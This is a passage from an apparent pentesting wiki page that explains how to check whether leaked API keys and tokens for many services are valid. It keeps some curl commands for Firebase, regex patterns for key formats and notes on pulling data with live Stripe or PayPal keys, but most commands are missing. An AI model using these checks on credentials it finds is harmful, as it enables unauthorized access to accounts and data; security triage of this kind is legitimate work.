Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#ButterCMS-API-Key) * [Calendly API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Calendly-API-Key) * [Contentful Access Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Contentful-access-token) * [CircleCI Access Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#CircleCI-Access-Token) * [Cloudflare API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#cloudflare-api-key) * [Cypress record keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Cypress-record-key) * [DataDog API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#DataDog-API-key) * [Delighted API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Delighted-api-key) * [Deviant Art Access Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Deviant-Art-Access-Token) * [Deviant Art Secretarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Deviant-Art-Secret) * [Dropbox APIarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Dropbox-API) * [Facebook Access Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Facebook-Access-Token) * [Facebook AppSecretarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Facebook-AppSecret) * [Firebasearrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Firebase) * [Firebase Cloud Messaging (FCM)arrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Firebase-Cloud-Messaging) * [FreshDesk API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#FreshDesk-API-key) * [Github client id and client secretarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Github-client-id-and-client-secret) * [GitHub private SSH keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#GitHub-private-SSH-key) * [Github Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Github-Token) * [Gitlab personal access tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Gitlab-personal-access-token) * [GitLab runner registration tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Gitlab-runner-registration-token) * [Google Cloud Service Account credentialsarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Google-Cloud-Service-Account-credentials) * [Google Maps API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Google-Maps-API-key) * [Google Recaptcha keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Google-Recaptcha-key) * [Grafana Access Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Grafana-Access-Token) * [Help Scout OAUTHarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Help-Scout-OAUTH) * [Heroku API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Heroku-API-key) * [HubSpot API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Hubspot-API-key) * [Infura API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Infura-API-key) * [Instagram Access Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Instagram-Access-Token) * [Instagram Basic Display APIarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Instagram-Basic-Display-API-Access-Token) * [Instagram Graph APIarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Instagram-Graph-Api-Access-Token) * [Ipstack API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Ipstack-API-Key) * [Iterable API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Iterable-API-Key) * [JumpCloud API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#JumpCloud-API-Key) * [Keen.io API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Keenio-API-Key) * [LinkedIn OAUTHarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#LinkedIn-OAUTH) * [Lokalise API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Lokalise-API-Key) * [Loqate API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Loqate-API-key) * [MailChimp API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#MailChimp-API-Key) * [MailGun Private Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#MailGun-Private-Key) * [Mapbox API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Mapbox-API-Key) * [Microsoft Azure Tenantarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Microsoft-Azure-Tenant) * [Microsoft Shared Access Signatures (SAS)arrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Microsoft-Shared-Access-Signatures-(SAS)) * [New Relic Personal API Key (NerdGraph)arrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#New-Relic-Personal-API-Key-(NerdGraph)) * [New Relic REST APIarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#New-Relic-REST-API) * [NPM tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#NPM-token) * [OpsGenie API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#OpsGenie-API-Key) * [Pagerduty API tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Pagerduty-API-token) * [Paypal client id and secret keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Paypal-client-id-and-secret-key) * [Pendo Integration Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Pendo-Integration-Key) * [PivotalTracker API Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#PivotalTracker-API-Token) * [Razorpay API key and secret keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Razorpay-keys) * [Salesforce API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Salesforce-API-key) * [SauceLabs Username and access Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#SauceLabs-Username-and-access-Key) * [SendGrid API Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#SendGrid-API-Token) * [Shodan.ioarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Shodan-Api-Key) * [Slack API tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Slack-API-token) * [Slack Webhookarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Slack-Webhook) * [Sonarcloudarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Sonarcloud-Token) * [Spotify Access Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Spotify-Access-Token) * [Squarearrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Square) * [Stripe Live Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Stripe-Live-Token) * [Telegram Bot API Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Telegram-Bot-API-Token) * [Travis CI API tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Travis-CI-API-token) * [Twilio Account\_sid and Auth tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Twilio-Account_sid-and-Auth-token) * [Twitter API Secretarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Twitter-API-Secret) * [Twitter Bearer tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Twitter-Bearer-token) * [Visual Studio App Center API Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Visual-Studio-App-Center-API-Token) * [WakaTime API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#WakaTime-API-Key) * [WeGlot Api Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#weglot-api-key) * [WPEngine API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#WPEngine-API-Key) * [YouTube API Keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#YouTube-API-Key) * [Zapier Webhook Tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Zapier-Webhook-Token) * [Zendesk Access tokenarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Zendesk-Access-Token) * [Zendesk API keyarrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#Zendesk-api-key) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#detailed-information) Detailed Information ---------------------------------------------------------------------------------------------------------------- ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#slack-webhook) [Slack Webhookarrow-up-right](https://api.slack.com/incoming-webhooks) If the below command returns `missing_text_or_fallback_or_attachments`, it means that the URL is valid, any other responses would mean that the URL is invalid. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#slack-api-token) [Slack API tokenarrow-up-right](https://api.slack.com/web) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#saucelabs-username-and-access-key) [SauceLabs Username and access Keyarrow-up-right](https://wiki.saucelabs.com/display/DOCS/Account+Methods) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#facebook-appsecret) Facebook AppSecret You can generate access tokens by visiting the URL below. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#facebook-access-token) Facebook Access Token ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#firebase) [Firebasearrow-up-right](https://firebase.google.com/) Requires a **custom token**, and an **API key**. 1. Obtain ID token and refresh token from custom token and API key: `curl -s -XPOST -H 'content-type: application/json' -d '{"token":":custom_token","returnSecureToken":True}' 'https://identitytoolkit.googleapis.com/v1/accounts:signInWithCustomToken?key=:api_key'` 2. Exchange ID token for auth token: `curl -s -XPOST -H 'content-type: application/json' -d '{"idToken":":id_token"}' https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyCustomToken?key=:api_key'` ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#github-token) [Github Tokenarrow-up-right](https://developer.github.com/v3/) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#github-client-id-and-client-secret) [Github client id and client secretarrow-up-right](https://developer.github.com/v3/#oauth2-keysecret) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#firebase-cloud-messaging) [Firebase Cloud Messagingarrow-up-right](https://firebase.google.com/docs/cloud-messaging) Reference: [https://abss.me/posts/fcm-takeoverarrow-up-right](https://abss.me/posts/fcm-takeover) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#github-private-ssh-key) GitHub private SSH key SSH private keys can be tested against github.com to see if they are registered against an existing user account. If the key exists the username corresponding to the key will be provided. ([sourcearrow-up-right](https://github.com/streaak/keyhacks/issues/2) ) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#twilio-account_sid-and-auth-token) [Twilio Account\_sid and Auth tokenarrow-up-right](https://www.twilio.com/docs/iam/api/account) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#twitter-api-secret) [Twitter API Secretarrow-up-right](https://developer.twitter.com/en/docs/basics/authentication/guides/bearer-tokens.html) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#twitter-bearer-token) [Twitter Bearer tokenarrow-up-right](https://developer.twitter.com/en/docs/accounts-and-users/subscribe-account-activity/api-reference/aaa-premium) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#hubspot-api-key) [HubSpot API keyarrow-up-right](https://developers.hubspot.com/docs/methods/owners/get_owners) Get all owners: Get all contact details: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#infura-api-key) [Infura API keyarrow-up-right](https://docs.infura.io/infura/networks/ethereum/how-to/secure-a-project/project-id) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#deviant-art-secret) [Deviant Art Secretarrow-up-right](https://www.deviantart.com/developers/authentication) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#deviant-art-access-token) [Deviant Art Access Tokenarrow-up-right](https://www.deviantart.com/developers/authentication) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#pendo-integration-key) [Pendo Integration Keyarrow-up-right](https://help.pendo.io/resources/support-library/api/index.html?bash#authentication) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#sendgrid-api-token) [SendGrid API Tokenarrow-up-right](https://docs.sendgrid.com/api-reference) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#square) [Squarearrow-up-right](https://squareup.com/) **Detection:** App id/client secret: `sq0[a-z]{3}-[0-9A-Za-z\-_]{22,43}` Auth token: `EAAA[a-zA-Z0-9]{60}` **Test App id & client secret:** Response indicating valid credentials: Response indicating invalid credentials: **Test Auth token:** Response indicating valid credentials: Response indicating invalid credentials: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#contentful-access-token) [Contentful Access Tokenarrow-up-right](https://www.contentful.com/developers/docs/references/authentication) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#dropbox-api) [Dropbox APIarrow-up-right](https://www.dropbox.com/developers/documentation/http/documentation) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#aws-access-key-id-and-secret) [AWS Access Key ID and Secretarrow-up-right](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-profiles.html) Install [awscliarrow-up-right](https://aws.amazon.com/cli/) , set the [access key and secret to environment variablesarrow-up-right](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) , and execute the following command: AWS credentials' permissions can be determined using [Enumerate-IAMarrow-up-right](https://github.com/andresriancho/enumerate-iam) . This gives broader view of the discovered AWS credentials privileges instead of just checking S3 buckets. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#lokalise-api-key) [Lokalise API Keyarrow-up-right](https://app.lokalise.com/api2docs/curl/#resource-authentication) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#mailgun-private-key) [MailGun Private Keyarrow-up-right](https://documentation.mailgun.com/en/latest/api_reference.html) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#freshdesk-api-key) [FreshDesk API Keyarrow-up-right](https://developers.freshdesk.com/api/#getting-started) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#jumpcloud-api-key) [JumpCloud API Keyarrow-up-right](https://docs.jumpcloud.com/1.0/authentication-and-authorization/authentication-and-authorization-overview) [**v1**arrow-up-right](https://docs.jumpcloud.com/1.0/systemusers) [**v2**arrow-up-right](https://docs.jumpcloud.com/2.0/systems/list-the-associations-of-a-system) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#microsoft-azure-tenant) Microsoft Azure Tenant Format: Verification: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#microsoft-shared-access-signatures-sas) [Microsoft Shared Access Signatures (SAS)arrow-up-right](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/storage/common/storage-dotnet-shared-access-signature-part-1.md) The following powershell can be used to test a Shared Access Signature Token: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#new-relic-personal-api-key-nerdgraph) [New Relic Personal API Key (NerdGraph)arrow-up-right](https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph#endpoint) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#new-relic-rest-api) [New Relic REST APIarrow-up-right](https://docs.newrelic.com/docs/apis/rest-api-v2/application-examples-v2/list-your-app-id-metric-timeslice-data-v2) If valid, test further to see if it's an [admin keyarrow-up-right](https://docs.newrelic.com/docs/apis/get-started/intro-apis/types-new-relic-api-keys#admin) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#heroku-api-key) [Heroku API keyarrow-up-right](https://devcenter.heroku.com/articles/platform-api-quickstart) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#mapbox-api-key) [Mapbox API keyarrow-up-right](https://docs.mapbox.com/api/) Mapbox secret keys start with `sk`, rest start with `pk` (public token), `sk` (secret token), or `tk` (temporary token). ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#salesforce-api-key) [Salesforce API keyarrow-up-right](https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/quickstart_oauth.htm) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#algolia-api-key) [Algolia API keyarrow-up-right](https://www.algolia.com/doc/rest-api/search/#overview) Be cautious when running this command, since the payload might execute within an administrative environment, depending on what index you are editing the `highlightPreTag` of. It's recommended to use a more silent payload (such as XSS Hunter) to prove the possible cross-site scripting attack. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#zapier-webhook-token) [Zapier Webhook Tokenarrow-up-right](https://zapier.com/help/how-get-started-webhooks-zapier/) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#pagerduty-api-token) [Pagerduty API tokenarrow-up-right](https://support.pagerduty.com/docs/using-the-api) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#browserstack-access-key) [BrowserStack Access Keyarrow-up-right](https://www.browserstack.com/automate/rest-api) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#google-maps-api-key) [Google Maps API keyarrow-up-right](https://developers.google.com/maps/documentation/javascript/get-api-key) **Key restrictions are set per service. When testing the key, if the key is restricted/inactive on one service try it with another.** Name Endpoint Pricing Static Maps [https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY_HERE) $2 Streetview [https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE) $7 Embed [https://www.google.com/maps/embed/v1/place?q=place\_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY\_HEREarrow-up-right](https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY_HERE) Varies Directions [https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY_HERE) $5 Geocoding [https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY_HERE) $5 Distance Matrix [https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE) $5 Find Place from Text [https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted\_address,name,rating,opening\_hours,geometry&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE) Varies Autocomplete [https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY_HERE) Varies Elevation [https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY_HERE) $5 Timezone [https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key=KEY\_HEREarrow-up-right](https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key=KEY_HERE) $5 Roads [https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key=KEY\_HEREarrow-up-right](https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795%7C60.170879,24.942796%7C60.170877,24.942796&key=KEY_HERE) $10 Geolocate [https://www.googleapis.com/geolocation/v1/geolocate?key=KEY\_HEREarrow-up-right](https://www.googleapis.com/geolocation/v1/geolocate?key=KEY_HERE) $5 _\*Pricing is in USD per 1000 requests (for the first 100k requests)_ More Information available here- [https://medium.com/@ozguralp/unauthorized-google-maps-api-key-usage-cases-and-why-you-need-to-care-1ccb28bf21earrow-up-right](https://medium.com/@ozguralp/unauthorized-google-maps-api-key-usage-cases-and-why-you-need-to-care-1ccb28bf21e) [https://github.com/ozguralp/gmapsapiscanner/arrow-up-right](https://github.com/ozguralp/gmapsapiscanner/) [https://developers.google.com/maps/api-key-best-practicesarrow-up-right](https://developers.google.com/maps/api-key-best-practices) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#google-recaptcha-key) [Google Recaptcha keyarrow-up-right](https://developers.google.com/recaptcha/docs/verify) Send a POST to the following URL: `secret` and `response` are two required POST parameters, where `secret` is the key and `response` is the response to test for. Regular expression: `^6[0-9a-zA-Z_-]{39}$`. The API key always starts with a 6 and is 40 chars long. Read more here: [https://developers.google.com/recaptcha/docs/verifyarrow-up-right](https://developers.google.com/recaptcha/docs/verify) . ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#google-cloud-service-account-credentials) [Google Cloud Service Account credentialsarrow-up-right](https://cloud.google.com/docs/authentication/production) Service Account credentials may be found in a JSON file like this: If this is your case you may check these credentials using `gcloud` tool ([how to install `gcloud`arrow-up-right](https://cloud.google.com/sdk/docs/quickstart-debian-ubuntu) ): In case of success you'll see access token printed in terminal. Please note that after verifying that credentials are actually valid you may want to enumerate permissions of these credentials which is another story. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#branch.io-key-and-secret) [Branch.IO Key and Secretarrow-up-right](https://docs.branch.io/pages/apps/deep-linking-api/#app-read) Visit the following URL to check for validity: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#bing-maps-api-key) [Bing Maps API Keyarrow-up-right](https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address) Visit this link to check for the key's validity. A valid key's response should start with `authenticationResultCode: "ValidCredentials"` ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#bit.ly-access-token) [Bit.ly Access tokenarrow-up-right](https://dev.bitly.com/authentication.html) Visit the following URL to check for validity: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#buildkite-access-token) [Buildkite Access tokenarrow-up-right](https://buildkite.com/docs/apis/rest-api) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#buttercms-api-key) [ButterCMS-API-Keyarrow-up-right](https://buttercms.com/docs/api/#authentication) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#asana-access-token) [Asana Access tokenarrow-up-right](https://asana.com/developers/documentation/getting-started/auth#personal-access-token) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#zendesk-access-token) [Zendesk Access tokenarrow-up-right](https://support.zendesk.com/hc/en-us/articles/203663836-Using-OAuth-authentication-with-your-application) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#zendesk-api-key) [Zendesk Api Keyarrow-up-right](https://developer.zendesk.com/api-reference/ticketing/introduction/) API tokens are different from OAuth tokens, API tokens are auto-generated passwords in the Support admin interface. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#mailchimp-api-key) [MailChimp API Keyarrow-up-right](https://developer.mailchimp.com/documentation/mailchimp/reference/overview/) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#wpengine-api-key) [WPEngine API Keyarrow-up-right](https://wpengineapi.com/) This issue can be further exploited by checking out [@hateshapearrow-up-right](https://github.com/hateshape/) 's gist [https://gist.github.com/hateshape/2e671ea71d7c243fac7ebf51fb738f0aarrow-up-right](https://gist.github.com/hateshape/2e671ea71d7c243fac7ebf51fb738f0a) . ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#datadog-api-key) [DataDog API keyarrow-up-right](https://docs.datadoghq.com/api/) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#delighted-api-key) [Delighted API keyarrow-up-right](https://app.delighted.com/docs/api) Do not delete the `:` at the end. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#travis-ci-api-token) [Travis CI API tokenarrow-up-right](https://developer.travis-ci.com/gettingstarted) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#telegram-bot-api-token) [Telegram Bot API Tokenarrow-up-right](https://core.telegram.org/bots/api#making-requests) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#wakatime-api-key) [WakaTime API Keyarrow-up-right](https://wakatime.com/developers) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#sonarcloud-token) [Sonarcloud Tokenarrow-up-right](https://sonarcloud.io/web_api) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#spotify-access-token) [Spotify Access Tokenarrow-up-right](https://developer.spotify.com/documentation/general/guides/authorization-guide/) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#instagram-basic-display-api-access-token) [Instagram Basic Display API Access Tokenarrow-up-right](https://developers.facebook.com/docs/instagram-basic-display-api/getting-started) E.g.: IGQVJ... ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#instagram-graph-api-access-token) [Instagram Graph API Access Tokenarrow-up-right](https://developers.facebook.com/docs/instagram-api/getting-started) E.g.: EAAJjmJ... ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#gitlab-personal-access-token) [Gitlab personal access tokenarrow-up-right](https://docs.gitlab.com/ee/api/README.html#personal-access-tokens) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#gitlab-runner-registration-token) [GitLab runner registration tokenarrow-up-right](https://docs.gitlab.com/runner/register/) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#paypal-client-id-and-secret-key) [Paypal client id and secret keyarrow-up-right](https://developer.paypal.com/docs/api/get-an-access-token-curl/) The access token can be further used to extract data from the PayPal API. More information: [https://developer.paypal.com/docs/api/overview/#make-rest-api-callsarrow-up-right](https://developer.paypal.com/docs/api/overview/#make-rest-api-calls) . This can be verified using: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#stripe-live-token) [Stripe Live Tokenarrow-up-right](https://stripe.com/docs/api/authentication) Keep the colon at the end of the token to prevent `cURL` from requesting a password. The token is always in the following format: `sk_live_24charshere`, where the `24charshere` part contains 24 characters from `a-z A-Z 0-9`. There is also a test key, which starts with `sk_test`, but this key is worthless since it is only used for testing purposes and most likely doesn't contain any sensitive information. The live key, on the other hand, can be used to extract/retrieve a lot of info — ranging from charges to the complete product list. Keep in mind that you will never be able to get the full credit card information since Stripe only gives you the last 4 digits. More info/complete documentation: [https://stripe.com/docs/api/authenticationarrow-up-right](https://stripe.com/docs/api/authentication) . ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#razorpay-api-key-and-secret-key) [Razorpay API key and Secret keyarrow-up-right](https://razorpay.com/docs/api/) This can be verified using: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#circleci-access-token) [CircleCI Access Tokenarrow-up-right](https://circleci.com/docs/api/#api-overview) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#cloudflare-api-key) [Cloudflare API keyarrow-up-right](https://api.cloudflare.com/#user-api-tokens-verify-token) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#loqate-api-key) [Loqate API keyarrow-up-right](https://www.loqate.com/resources/support/apis) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#ipstack-api-key) [Ipstack API 